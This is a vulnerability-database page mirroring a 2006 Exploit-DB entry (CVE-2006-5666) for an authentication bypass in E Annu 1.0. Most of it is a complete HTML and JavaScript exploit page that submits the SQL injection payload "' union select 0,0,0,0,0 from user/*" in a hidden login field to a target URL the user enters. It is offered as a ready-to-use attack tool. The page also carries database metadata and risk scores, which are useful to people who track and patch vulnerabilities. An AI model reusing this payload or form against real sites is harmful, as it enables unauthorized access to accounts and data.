Lucene search
+L

E Annu 1.0 - Authentication Bypass / SQL Injection

🗓️ 30 Oct 2006 00:00:00Reported by ajannType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Authentication Bypass / SQL Injection in E Annu 1.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-5666
3 Nov 200601:00
cve
cvelist
Cvelist
CVE-2006-5666
3 Nov 200601:00
cvelist
euvd
EUVD
EUVD-2006-5651
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-5666
3 Nov 200601:07
nvd
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>E Annu 1.0 Login Bypass SQL Injection Exploit</title>

<script language="JavaScript">

//'===============================================================================================
//'[Script Name: E Annu 1.0 Login Bypass SQL Injection Exploit
//'[Coded by   : ajann
//'[Author   : ajann
//'[Contact    : :(
//'[Using : Write Target after Submit Click
//'===============================================================================================


     //Basic exploit,but any time : (

function command(){
       if (document.sql.login.value==""){
          alert("Failed..");
      return false;
    }



  sql.action= document.sql.target1.value // Ready Target : )
  sql.submit(); // Form Submit
   }
</script>

</head>

<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">E Annu 1.0 Login Bypass SQL Injection</font></b></p>
<p></p>
<form method="post" name="sql" onSubmit="command();">
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>

  <input type="hidden" name="login" value="' union select 0,0,0,0,0 from user/*" onmouseout="javascript:this.style.background='#808000';"></p>
<input type="hidden" name="password">
<input type="hidden" name="action_connect">
<br>
 <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">

  <p><input type="submit" value="Gönder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
</p>
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</center>
</body>

</html>

# milw0rm.com [2006-10-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01095
35